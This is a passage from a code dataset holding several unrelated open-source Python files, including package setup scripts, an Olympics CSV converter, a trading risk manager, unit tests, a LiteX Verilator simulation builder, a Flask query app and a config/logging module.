TestCommand.finalize_options(self)\n# self.test_args = []\n# self.test_suite = True\n#\n# def run_tests(self):\n# import pytest\n# errcode = pytest.main(self.test_args)\n# sys.exit(errcode)\n\n\n#tests_require=['pytest'],\n#cmdclass={'test': PyTest},\n#test_suite='sandman.test.test_sandman',\n#extras_require={\n# 'testing': ['pytest'],\n#}\n\n\nsetup(\n name='CosmoPhotoz',\n version=photoz.__version__,\n url='http://github.com/COINtoolbox/COSMOPhotoz/CosmoPy',\n license='GNU Public License',\n author=photoz.__author__,\n install_requires=['matplotlib>=1.3.1',\n 'numpy>=1.8.2',\n 'pandas>=0.14.1',\n 'patsy>=0.3.0',\n 'scikit-learn>=0.15.1',\n 'scipy>=0.14.0',\n 'seaborn>=0.3.1',\n 'statsmodels>=0.5.0'],\n author_email=photoz.__email__,\n description=photoz.__doc__,\n long_description=long_description,\n packages=['CosmoPhotoz'],\n package_dir = {'CosmoPhotoz': 'CosmoPhotoz', 'data': 'CosmoPhotoz/data'},\n package_data = {'CosmoPhotoz/data': 'PHAT0.csv.bz2'},\n include_package_data = True,\n scripts=['CosmoPhotoz/run_glm.py'],\n platforms='any',\n classifiers = [\n 'Programming Language :: Python',\n 'Development Status :: 3 - Alpha',\n 'Natural Language :: English',\n 'Environment :: X11 Applications',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Scientific/Engineering :: Astronomy',\n ],\n)\n","repo_name":"COINtoolbox/CosmoPhotoz","sub_path":"Python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14610289739","text":"'''\n convert.py\n Carl Zhang, 12 Oct 2022\n\n The data was accessed here:\n https://www.kaggle.com/datasets/heesoo37/120-years-of-olympic-history-athletes-and-results\n To run this code, type python3 convert.py in terminal\n with the above dataset (athlete_events.csv) in your \n working directory\n \n Once running this file, there will be multiple csv files\n saved to your working directory. You will use these csv's\n copying their data to the database tables listed in the\n 'olympics-schema.sql'.\n\n Once this has been done, go to the 'queries.sql' file to\n see the next steps.\n'''\n\nimport csv\n\n# CREATE TABLE athletes (\n# athlete_id INTEGER,\n# fullname TEXT,\n# sex TEXT,\n# team TEXT,\n# noc TEXT,\n# sport TEXT\n# );\n\nathletes = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('athletes.csv', 'w') as athletes_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(athletes_file)\n heading_row = next(reader)\n for row in reader:\n athlete_id = row[0]\n fullname = row[1]\n athlete_sex = row[2]\n team = row[6]\n noc = row[7]\n sport = row[12]\n if athlete_id not in athletes:\n athletes[athlete_id] = fullname\n writer.writerow([athlete_id, fullname, athlete_sex, team, noc, sport])\n\n# CREATE TABLE events (\n# id SERIAL,\n# event TEXT\n# );\n\nevents = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('events.csv', 'w') as events_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(events_file)\n heading_row = next(reader) # eat up and ignore the heading row of the data file\n for row in reader:\n event_name = row[13]\n if event_name not in events:\n event_id = len(events) + 1\n events[event_name] = event_id\n writer.writerow([event_id, event_name])\n\n# CREATE TABLE games (\n# id SERIAL,\n# game TEXT\n# );\n\ngames = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('games.csv', 'w') as games_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(games_file)\n heading_row = next(reader)\n for row in reader:\n game_name = row[8]\n if game_name not in games:\n game_id = len(games) + 1\n games[game_name] = game_id\n writer.writerow([game_id, game_name])\n\n# CREATE TABLE event_results (\n# athlete_id INTEGER,\n# game_id INTEGER,\n# event_id INTEGER,\n# medal TEXT\n# );\n\nwith open('athlete_events.csv') as original_data_file,\\\n open('event_results.csv', 'w') as event_results_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(event_results_file)\n heading_row = next(reader)\n for row in reader:\n athlete_id = row[0]\n game_id = games[row[8]]\n event_id = events[row[13]]\n medal = row[14]\n writer.writerow([athlete_id, game_id, event_id, medal])\n\n\n# CREATE TABLE games_traits (\n# game_id INTEGER,\n# year INTEGER,\n# season TEXT,\n# city TEXT\n# );\n\ngames_ids = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('game_traits.csv', 'w') as games_traits_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(games_traits_file)\n heading_row = next(reader)\n for row in reader:\n game_id = games[row[8]]\n year = row[9]\n season = row[10]\n city = row[11]\n if game_id not in games_ids:\n games_ids[game_id] = 1\n writer.writerow([game_id, year, season, city])\n\n# CREATE TABLE medal_count (\n# noc_id integer\n# gold integer\n# silver integer\n# bronze integer\n# );\n\nnocs = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('medal_counts.csv', 'w') as medal_counts_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(medal_counts_file)\n heading_row = next(reader)\n for row in reader:\n noc_name = row[7]\n if noc_name not in nocs:\n # first index for gold\n # second index for silver\n # third index for bronze\n # fourth index for id\n noc_medals = [0,0,0,0]\n nocs[noc_name] = noc_medals\n nocs[noc_name][3] = len(nocs)\n elif noc_name in nocs:\n if row[14].lower() == 'gold':\n nocs[noc_name][0] += 1\n elif row[14].lower() == 'silver':\n nocs[noc_name][1] += 1\n elif row[14].lower() == 'bronze':\n nocs[noc_name][2] += 1\n # the array stored is now accessed through iterating the dictionary\n # by noc_name and writing onto the csv with the desired information.\n for key in nocs:\n writer.writerow([nocs[key][3], key, nocs[key][0], nocs[key][1], nocs[key][2]])\n\n# CREATE TABLE nocs (\n# id SERIAL,\n# noc_name TEXT\n# );\n\nnocs = {}\nwith open('athlete_events.csv') as original_data_file,\\\n open('nocs.csv', 'w') as nocs_file:\n reader = csv.reader(original_data_file)\n writer = csv.writer(nocs_file)\n heading_row = next(reader)\n for row in reader:\n noc_name = row[7]\n if noc_name not in nocs:\n noc_id = len(nocs) + 1\n nocs[noc_name] = noc_id\n writer.writerow([noc_id, noc_name])","repo_name":"czhang2884/cs257","sub_path":"olympics/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25613511472","text":"import setuptools\n\nwith open('README.md', \"r\") as readme:\n long_description = readme.read()\n\nsetuptools.setup(\n name=\"simple-paramiko\",\n version=\"0.0.1\",\n author=\"Sergey Parshin\",\n author_email=\"parshinsp@gmail.com\",\n description=\"Simplified Paramiko connection package. That allows command execution without any configuration headache.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Shooshp/simple-paramiko\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n)\n","repo_name":"Shooshp/simple-paramiko","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37516129423","text":"import numpy\nimport matplotlib.pyplot as plt\nimport os\nfrom os.path import dirname, join, exists\ncurdir = dirname(__file__)\n\n\"\"\"\nPlot experimental slope\n\"\"\"\n\n\ndef get_time(string):\n string = string.decode(\"ascii\")\n h, m, s = map(float, string.split(\":\"))\n return 3600 * h + 60 * m + 1 * s\n \ndata = numpy.genfromtxt(join(curdir, \"../data/exp/diffusion-slope.csv\"),\n converters={1: get_time},\n delimiter=\",\")\n\nplt.figure(figsize=(3, 3 * 0.8))\nplt.style.use(\"science\")\ncond = numpy.where(data[:, 1] < 3600)\n# plt.plot(data[:, 1][cond] / 3600, data[:, 2][cond] / 1e-3)\n# plt.plot(data[:, 1][data[:, 1] > 7200] / 3600, data[:, 2][data[:, 1] > 7200] / 1e-3)\nplt.plot(data[:, 1] / 3600, data[:, 2] / 1e-3)\nplt.xlabel(\"t (h)\")\nplt.ylabel(\"Conductivity\")\nplt.savefig(join(curdir, \"../img/diffusion-slope.svg\"))\n","repo_name":"alchem0x2A/paper.gr_nanopore","sub_path":"data/plots/src/plot_diffusion_slope.py","file_name":"plot_diffusion_slope.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70634116649","text":"import numpy as np\nimport pandas as pd\nfrom technotrader.trading.agent import Agent\nimport technotrader.utils.agent_utils as agent_utils\n\n\nclass TrendFollowRiskManager(Agent):\n \"\"\"\n Risk Manager base on Trend Tracking.\n Returns weights: the greater the weights is\n the less risky is the asset.\n \"\"\"\n def __init__(self, config, data_loader, trade_log=None):\n super().__init__(config, data_loader)\n self.instruments_list = config[\"instruments_list\"]\n self.verbose = False\n if config.get(\"verbose\") is not None:\n if config[\"verbose\"]:\n self.verbose = True\n self.window_long = config['window_long']\n self.window_short = config['window_short']\n assert self.window_long > self.window_short, \\\n \"window_long must be greater than window_short\"\n self.down_trend_threshold = config[\"down_trend_threshold\"]\n self.n_inst = len(self.instruments_list)\n timetable = agent_utils.ExchangeTimetable(config[\"exchange\"])\n self.data_extractor = agent_utils.DataExtractor(data_loader,\n timetable, config, self.window_long + 1, False)\n self.previous_trends = None\n self.down_trend_counter = np.zeros(len(self.instruments_list))\n\n def check_trend(self, data):\n long_mean = np.mean(data[-self.window_long:], axis=0)\n short_mean = np.mean(data[-self.window_short:], axis=0)\n trends = short_mean >= long_mean\n # check if previous trends still continue\n prev_trends = self.previous_trends\n\n self.down_trend_counter[trends] = 0\n self.down_trend_counter[~trends] += 1\n\n weights = np.ones(self.n_inst)\n weights[self.down_trend_counter >= self.down_trend_threshold] = 0.\n\n self.previous_trends = trends\n return weights\n\n def compute_risks(self, epoch):\n data_prices = self.data_extractor(epoch)\n weights = self.check_trend(data_prices)\n if self.verbose:\n print(\"risk weights:\", weights)\n preds_dict = {}\n for i, instrument in enumerate(self.instruments_list):\n preds_dict[instrument] = weights[i]\n return preds_dict\n","repo_name":"kolomeytsev/technotrader","sub_path":"risk_managers/risk_trend_follow.py","file_name":"risk_trend_follow.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19812854647","text":"hours = int(input())\nminutes = int(input())\ntimes = int(input())\n\nwait_hours = (hours + ((times + minutes) // 60)) % 24\nwait_minutes = minutes + (times % 60) % 60\n\n\nprint(f'{wait_hours:>02}:{wait_minutes:>02}')\n\n# 8\n# 0\n# 65\n\n# 09:05\n\n\n# 10\n# 15\n# 2752\n\n# 08:07\n","repo_name":"KaJIuHa/styding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24637289056","text":"import sys\r\nsys.path.append(\".\")\r\nfrom project.student_report_card import StudentReportCard\r\nfrom unittest import TestCase, main\r\n\r\nclass TestCard(TestCase):\r\n def setUp(self):\r\n self.card = StudentReportCard(\"Ivan\", 10)\r\n \r\n def test_constructor(self):\r\n with self.assertRaises(ValueError) as er:\r\n card = StudentReportCard(\"\", 10)\r\n self.assertEqual(\"Student Name cannot be an empty string!\", str(er.exception))\r\n\r\n with self.assertRaises(ValueError) as er:\r\n card = StudentReportCard(\"Ivan\", 0)\r\n self.assertEqual(\"School Year must be between 1 and 12!\", str(er.exception))\r\n\r\n with self.assertRaises(ValueError) as er:\r\n card = StudentReportCard(\"Ivan\", 13)\r\n self.assertEqual(\"School Year must be between 1 and 12!\", str(er.exception))\r\n\r\n self.assertEqual(\"Ivan\", self.card.student_name)\r\n self.assertEqual(10, self.card.school_year)\r\n self.assertEqual({}, self.card.grades_by_subject)\r\n\r\n self.card.school_year = 1\r\n self.assertEqual(1, self.card.school_year)\r\n self.assertEqual(\"Ivan\", self.card.student_name)\r\n self.assertEqual({}, self.card.grades_by_subject)\r\n\r\n self.card.school_year = 12\r\n self.assertEqual(12, self.card.school_year)\r\n self.assertEqual(\"Ivan\", self.card.student_name)\r\n self.assertEqual({}, self.card.grades_by_subject)\r\n\r\n \r\n def test_add_grade(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.assertEqual({\"math\": [4]}, self.card.grades_by_subject)\r\n self.assertEqual([4], self.card.grades_by_subject[\"math\"])\r\n \r\n \r\n def test_average_grade_by_subject(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"math\", 5)\r\n self.card.add_grade(\"bio\", 5)\r\n self.assertEqual({\"math\": [4, 5], \"bio\": [5]}, self.card.grades_by_subject)\r\n self.assertEqual([4, 5], self.card.grades_by_subject[\"math\"])\r\n self.assertEqual([5], self.card.grades_by_subject[\"bio\"])\r\n msg = self.card.average_grade_by_subject()\r\n self.assertEqual(\"math: 4.50\\nbio: 5.00\", msg)\r\n\r\n def test_average_grade_for_all_subjects(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"math\", 5)\r\n self.card.add_grade(\"math\", 3)\r\n self.card.add_grade(\"math\", 6)\r\n self.card.add_grade(\"bio\", 5)\r\n self.card.add_grade(\"bio\", 2)\r\n self.card.add_grade(\"bio\", 4)\r\n self.card.add_grade(\"bio\", 6)\r\n msg = self.card.average_grade_for_all_subjects()\r\n self.assertEqual(\"Average Grade: 4.38\", msg)\r\n\r\n def test_repr(self):\r\n self.card.add_grade(\"math\", 4)\r\n self.card.add_grade(\"bio\", 5)\r\n msg = repr(self.card)\r\n expected_msg = f\"Name: Ivan\\n\" \\\r\n f\"Year: 10\\n\" \\\r\n f\"----------\\n\" \\\r\n f\"math: 4.00\\n\" \\\r\n f\"bio: 5.00\\n\" \\\r\n f\"----------\\n\" \\\r\n f\"Average Grade: 4.50\"\r\n self.assertEqual(expected_msg, msg)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Exams/Hotel_Everland/Testing/project/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13245227825","text":"import os\nimport subprocess\n\nfrom litex.gen.fhdl.structure import _Fragment\nfrom litex.build import tools\nfrom litex.build.generic_platform import *\n\n\nsim_directory = os.path.abspath(os.path.dirname(__file__))\ncore_directory = os.path.join(sim_directory, 'core')\n\n\ndef _generate_sim_h_struct(name, index, siglist):\n content = ''\n\n content += 'struct pad_s {}{}[] = {{\\n'.format(name, index)\n for signame, sigbits, dummy in siglist:\n content += ' {{ (char*)\"{}\", {}, NULL }},\\n'.format(signame, sigbits)\n content += ' { NULL, 0, NULL }\\n'\n content += '};\\n\\n'\n\n return content\n\n\ndef _generate_sim_h(platform):\n content = \"\"\"\\\n#ifndef __SIM_CORE_H_\n#define __SIM_CORE_H_\n#include \"pads.h\"\n\n\"\"\"\n for args in platform.sim_requested:\n content += _generate_sim_h_struct(*args)\n\n content += \"\"\"\\\n#ifndef __cplusplus\nvoid litex_sim_init(void **out);\n#endif\n\n#endif /* __SIM_CORE_H_ */\n\"\"\"\n tools.write_to_file(\"dut_header.h\", content)\n\n\ndef _generate_sim_cpp_struct(name, index, siglist):\n content = ''\n\n for i, (signame, sigbits, sigfname) in enumerate(siglist):\n content += ' {}{}[{}].signal = &dut->{};\\n'.format(name, index, i, sigfname)\n\n idx_int = 0 if not index else int(index)\n content += ' litex_sim_register_pads({}{}, (char*)\"{}\", {});\\n\\n'.format(name, index, name, idx_int)\n\n return content\n\n\ndef _generate_sim_cpp(platform):\n content = \"\"\"\\\n#include \n#include \n#include \n#include \"Vdut.h\"\n#include \n#include \"dut_header.h\"\n\nextern \"C\" void litex_sim_init(void **out)\n{\n Vdut *dut;\n\n dut = new Vdut;\n\n\"\"\"\n for args in platform.sim_requested:\n content += _generate_sim_cpp_struct(*args)\n\n content += \"\"\"\\\n *out=dut;\n}\n\"\"\"\n tools.write_to_file(\"dut_init.cpp\", content)\n\n\ndef _generate_sim_variables(include_paths):\n include = \"\"\n for path in include_paths:\n include += \"-I\"+path+\" \"\n\n content = \"\"\"\\\nSRC_DIR = {}\nINC_DIR = {}\n\"\"\".format(core_directory, include)\n tools.write_to_file(\"variables.mak\", content)\n\n\ndef _generate_sim_config(config):\n content = config.get_json()\n tools.write_to_file(\"sim_config.js\", content)\n\n\ndef _build_sim(platform, build_name, verbose):\n makefile = os.path.join(core_directory, 'Makefile')\n build_script_contents = \"\"\"\\\nrm -rf obj_dir/\nmake -C . -f {}\nmkdir -p modules && cp obj_dir/*.so modules\n\"\"\".format(makefile)\n build_script_file = \"build_\" + build_name + \".sh\"\n tools.write_to_file(build_script_file, build_script_contents, force_unix=True)\n\n p = subprocess.Popen([\"bash\", build_script_file], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output, _ = p.communicate()\n output = output.decode('utf-8')\n if p.returncode != 0:\n error_messages = []\n for l in output.splitlines():\n if verbose or \"error\" in l.lower():\n error_messages.append(l)\n raise OSError(\"Subprocess failed with {}\\n{}\".format(p.returncode, \"\\n\".join(error_messages)))\n if verbose:\n print(output)\n\n\ndef _run_sim(build_name):\n run_script_contents = \"\"\"\\\nsudo obj_dir/Vdut\n\"\"\"\n run_script_file = \"run_\" + build_name + \".sh\"\n tools.write_to_file(run_script_file, run_script_contents, force_unix=True)\n r = subprocess.call([\"bash\", run_script_file])\n if r != 0:\n raise OSError(\"Subprocess failed\")\n\n\nclass SimVerilatorToolchain:\n def build(self, platform, fragment, build_dir=\"build\", build_name=\"top\",\n toolchain_path=None, serial=\"console\", run=True, verbose=True,\n sim_config=None):\n os.makedirs(build_dir, exist_ok=True)\n os.chdir(build_dir)\n\n if not isinstance(fragment, _Fragment):\n fragment = fragment.get_fragment()\n platform.finalize(fragment)\n\n v_output = platform.get_verilog(fragment)\n named_sc, named_pc = platform.resolve_signals(v_output.ns)\n v_output.write(\"dut.v\")\n\n include_paths = []\n for source in platform.sources:\n path = os.path.dirname(source[0]).replace(\"\\\\\", \"\\/\")\n if path not in include_paths:\n include_paths.append(path)\n include_paths += platform.verilog_include_paths\n _generate_sim_h(platform)\n _generate_sim_cpp(platform)\n _generate_sim_variables(include_paths)\n if sim_config:\n _generate_sim_config(sim_config)\n _build_sim(platform, build_name, verbose)\n\n if run:\n _run_sim(build_name)\n\n os.chdir(\"..\")\n\n return v_output.ns\n","repo_name":"rowhit/litex","sub_path":"litex/build/sim/verilator.py","file_name":"verilator.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37201848591","text":"from flask import Flask, render_template\r\nimport sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\ndef retrieve_top_customers():\r\n connection = sqlite3.connect(\"customer_orders.db\")\r\n cursor = connection.cursor()\r\n \r\n query = \"\"\"\r\n SELECT c.name, c.email, SUM(o.order_value) AS total_order_value\r\n FROM Customers c\r\n JOIN Orders o ON c.customer_id = o.customer_id\r\n WHERE o.order_date >= date('now', '-30 days')\r\n GROUP BY c.name, c.email\r\n HAVING COUNT(o.order_id) = 1\r\n ORDER BY total_order_value DESC\r\n LIMIT 10\r\n \"\"\"\r\n \r\n cursor.execute(query)\r\n results = cursor.fetchall()\r\n \r\n cursor.close()\r\n connection.close()\r\n \r\n return results\r\n\r\n@app.route('/top_customers')\r\ndef top_customers():\r\n customers = retrieve_top_customers()\r\n return render_template('results.html', customers=customers)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"armannakhwa/Eiosys-task","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28144898350","text":"import os\n\nwhile True:\n a= str(input('请输入一个大于6位数的整数:'))\n if a.isdigit() and len(a) > 6:\n print('输出:%s' %(a[-7:-3]))\n break\n else:\n print('不合要求,重新输入')\n\n","repo_name":"liaolibo-jay/instance","sub_path":"exercise100/e11.9.py","file_name":"e11.9.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1025380964","text":"class Solution(object):\n def hammingWeight(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n #count_bit_holder=0#were gonna update this by one everytime we encounter a 1 so that we can do 2^count_bit_holder\n # we need the length of n\n \n #this idea would have worked but for some reason the input isnt really being read properly so we hjad to goggle bthe bit manipulation.\n #tldr anding and n-1 the amount of times that and occurs will show how many 1s are in the integer\n bit_count=0\n while n>0:\n n=n&(n-1)\n bit_count+=1\n \n return bit_count","repo_name":"Amiris17/LeetCode","sub_path":"191-number-of-1-bits/191-number-of-1-bits.py","file_name":"191-number-of-1-bits.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74280810089","text":"import numpy as np\nfrom sklearn.datasets import make_blobs\n\nimport urllib\nimport json\nimport datetime\nimport calendar\nfrom os import path\nfrom collections import Counter\n\nJSON_FILE = 'weather.json'\n\nif not path.exists(JSON_FILE):\n data_url = 'https://data.townofcary.org/api/v2/catalog/datasets/rdu-weather-history/exports/json'\n\n urllib.request.urlretrieve(data_url, JSON_FILE)\n\nf = open(JSON_FILE, 'r')\nlines = f.readlines()\nf.close()\njson_data = ''.join(lines)\n\nweather = json.loads(json_data)\n\nweather_by_date = {}\n\nfor day in weather:\n dt = datetime.datetime.strptime(day['date'], '%Y-%m-%d')\n if dt.year < 2019:\n if not dt.year in list(weather_by_date.keys()):\n weather_by_date[dt.year] = {}\n if not dt.month in weather_by_date[dt.year].keys():\n weather_by_date[dt.year][dt.month] = []\n weather_by_date[dt.year][dt.month].append(day)\n \nflatten = lambda l: [item for sublist in l for item in sublist]\n\nMONTHS = np.array([calendar.month_abbr[m] for m in (np.arange(12) + 1)])\n\ndef monthly_data_by_key(month=1, key='precipitation'):\n monthly_data = flatten([weather_by_date[year][month] for year in weather_by_date.keys()])\n return [day[key] for day in monthly_data]\n\ndef data_by_key(year=2018, key='precipitation'):\n return flatten([weather_by_date[year][month] for month in np.arange(1, 13)])\n\ndef monthly_data_values_by_key(month=1, key='precipitation'):\n monthly_data = flatten([weather_by_date[year][month] for year in weather_by_date.keys()])\n return [day[key] for day in monthly_data]\n\ndef monthly_freq_counts(month=1, key='precipitation'):\n data = np.array(monthly_data_by_key(month=month, key=key))\n l_bound = np.min(data)\n u_bound = np.max(data)\n intervals = np.linspace(l_bound, u_bound, 11)\n freq = Counter()\n \n for point in data:\n for index, interval in enumerate(intervals):\n if point < interval:\n freq[index] += 1\n break\n \n return [freq[key] for key in sorted(freq.keys())]\n\ndef precip_sums_for_year(year=2018):\n if year not in sorted(list(weather_by_date.keys())):\n raise IndexError('Invalid year')\n weather_for_year = weather_by_date[year]\n return sorted(zip(weather_for_year.keys(), [sum([day['precipitation'] for day in weather_for_year[month]]) for month in weather_for_year.keys()]))\n\ndef temps_by_month_for_year(year=2018):\n if year not in sorted(list(weather_by_date.keys())):\n raise IndexError('Invalid year')\n the_weather = weather_by_date[year]\n the_weather = dict(zip(sorted(the_weather.keys()), [[day['temperaturemax'] for day in the_weather[month]] for month in sorted(the_weather.keys())]))\n for key in the_weather.keys():\n if len(the_weather[key] < 31):\n the_weather[key]\n \n\ndef get_wind_points():\n avg_wind = monthly_data_by_key(month=1, key='avgwindspeed')\n fast_wind = monthly_data_by_key(month=1, key='fastest5secwindspeed')\n \n points = list(zip(avg_wind, fast_wind))\n points = np.array([point for point in points if point[0] is not None and point[1] is not None])\n for _ in range(5):\n mindex = np.argmax(points[:,1])\n points = np.delete(points, mindex, 0)\n return points\n\ndef get_blobs():\n return make_blobs(n_samples=200, centers=5)\n\ndef get_normal_counts(n_samples=10000):\n data = np.random.randn(n_samples)\n freq = Counter()\n \n l_bound = np.min(data)\n u_bound = np.max(data)\n intervals = np.linspace(l_bound, u_bound, 21)\n \n for point in data:\n for index, interval in enumerate(intervals):\n if point < interval:\n freq[index] += 1\n break\n \n return [freq[key] for key in sorted(freq.keys())]\n \n ","repo_name":"ceth-x86/datascience","sub_path":"matplotlib/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1013792384","text":"import os\nimport platform\nimport sys\nimport time\nfrom configparser import ConfigParser\n\n\n# def MyLogger():\n# logger = logging.getLogger(__name__)\n# logger.setLevel(logging.INFO)\n# ch = logging.StreamHandler()\n# ch.setLevel(logging.INFO)\n# logger.addHandler(ch)\n# return logger\n\ndef mini_conf():\n cwd = os.path.dirname(os.path.dirname(__file__))\n path = [os.path.join(cwd, 'embyToLocalPlayer' + ext) for ext in (\n f'-{platform.system()}.ini', '.ini', '_config.ini')]\n path = [i for i in path if os.path.exists(i)][0]\n config = ConfigParser()\n config.read(path, encoding='utf-8-sig')\n return config\n\n\nraw_stdout = sys.stdout\n\n\nclass Stdout:\n\n def __init__(self):\n self.log_file = mini_conf().get('dev', 'log_file', fallback='')\n if self.log_file:\n if self.log_file.startswith('./'):\n cwd = os.path.dirname(os.path.dirname(__file__))\n self.log_file = os.path.join(cwd, self.log_file.split('./', 1)[1])\n mode = 'a' if os.path.exists(self.log_file) and os.path.getsize(self.log_file) < 10 * 1024000 else 'w'\n if not os.path.exists(self.log_file):\n os.makedirs(os.path.dirname(self.log_file), exist_ok=True)\n self.log_file = open(self.log_file, mode, encoding='utf-8')\n\n def write(self, *args, end=''):\n log = str(*args) + end\n if MyLogger.need_mix:\n log = MyLogger.mix_args_str(log)[0]\n raw_stdout.write(log)\n if self.log_file:\n self.log_file.write(log)\n self.log_file.flush()\n\n def flush(self):\n pass\n\n\nif mini_conf().get('dev', 'log_file', fallback=''):\n sys.stdout = Stdout()\n sys.stderr = sys.stdout\n\n\nclass MyLogger:\n need_mix = True\n api_key = '_hide_api_key_'\n netloc = '_mix_netloc_'\n netloc_replace = '_mix_netloc_'\n user_name = os.getlogin()\n\n def __init__(self):\n self.debug_mode = configs.debug_mode\n\n @staticmethod\n def mix_host_gen(netloc):\n host, *port = netloc.split(':')\n port = ':' + port[0] if port else ''\n new = host[:len(host) // 2] + '_mix_host_' + port\n return new\n\n @staticmethod\n def mix_args_str(*args):\n return [str(i).replace(MyLogger.api_key, '_hide_api_key_')\n .replace(MyLogger.netloc, MyLogger.netloc_replace)\n .replace(MyLogger.user_name, '_hide_user_')\n for i in args]\n\n @staticmethod\n def log(*args, end=None, silence=False):\n if silence:\n return\n t = f\"[{time.strftime('%D %H:%M:%S', time.localtime())}] \"\n args = ' '.join(str(i) for i in args)\n print(t + args, end=end)\n\n def info(self, *args, end=None, silence=False):\n if not silence and MyLogger.need_mix:\n args = self.mix_args_str(*args)\n self.log(*args, end=end, silence=silence)\n\n def debug(self, *args, end=None, silence=False):\n if self.debug_mode:\n self.log(*args, end=end, silence=silence)\n\n def error(self, *args, end=None, silence=False):\n self.log(*args, end=end, silence=silence)\n\n\nclass Configs:\n\n def __init__(self):\n self.platform = platform.system()\n self.cwd = os.path.dirname(os.path.dirname(__file__))\n self.path = [os.path.join(self.cwd, 'embyToLocalPlayer' + ext) for ext in (\n f'-{self.platform}.ini', '.ini', '_config.ini')]\n self.path = [i for i in self.path if os.path.exists(i)][0]\n MyLogger.log(MyLogger.mix_args_str(f'Python path: {sys.executable}'))\n MyLogger.log(MyLogger.mix_args_str(f'ini path: {self.path}'))\n MyLogger.log(f'{platform.platform(True)} Python-{platform.python_version()}')\n self.raw: ConfigParser = self.update()\n self.fullscreen = self.raw.getboolean('emby', 'fullscreen', fallback=True)\n self.speed_limit = self.raw.getfloat('dev', 'speed_limit', fallback=0)\n self.debug_mode = self.raw.getboolean('dev', 'debug', fallback=False)\n self.disable_audio = self.raw.getboolean('dev', 'disable_audio', fallback=False) # test in vm\n self.gui_is_enable = self.raw.getboolean('gui', 'enable', fallback=False)\n self.cache_path = self.raw.get('gui', 'cache_path', fallback=None)\n self.cache_db = self._get_cache_db()\n self.sys_proxy = self._get_sys_proxy()\n self.dl_proxy = self._get_proxy('download')\n self.script_proxy = self._get_proxy('script')\n self.player_proxy = self._get_proxy('player')\n if self.debug_mode:\n print('dl_proxy:', self.dl_proxy)\n print('cache_db:', self.cache_db)\n\n def ini_str_split(self, section, option, fallback=''):\n ini = self.raw.get(section, option, fallback=fallback).replace(',', ',')\n ini = [i.strip() for i in ini.split(',') if i.strip()]\n return ini\n\n def _get_cache_db(self):\n _cache_db = os.path.join(self.cache_path, '.embyToLocalPlayer.json') if self.cache_path else None\n _dev_cache_db = os.path.join(self.cwd, 'z_cache.json')\n return _dev_cache_db if os.path.exists(_dev_cache_db) else _cache_db\n\n def _get_sys_proxy(self):\n if not self.raw.getboolean('dev', 'use_system_proxy', fallback=True):\n return\n import urllib.request\n proxy = urllib.request.getproxies().get('http')\n if not proxy:\n return\n print(f'system proxy: {proxy}')\n proxy = proxy.split('://')\n proxy = proxy[1] if len(proxy) == 2 else proxy[0]\n return proxy\n\n def _get_proxy(self, for_what):\n if self.sys_proxy:\n return self.sys_proxy\n p_map = dict(download=['gui', 'http_poxy', ''],\n script=['dev', 'script_proxy', ''],\n player=['dev', 'player_proxy', ''])\n *args, fallback = p_map[for_what]\n proxy = self.raw.get(*args, fallback=fallback)\n if 'socks' in 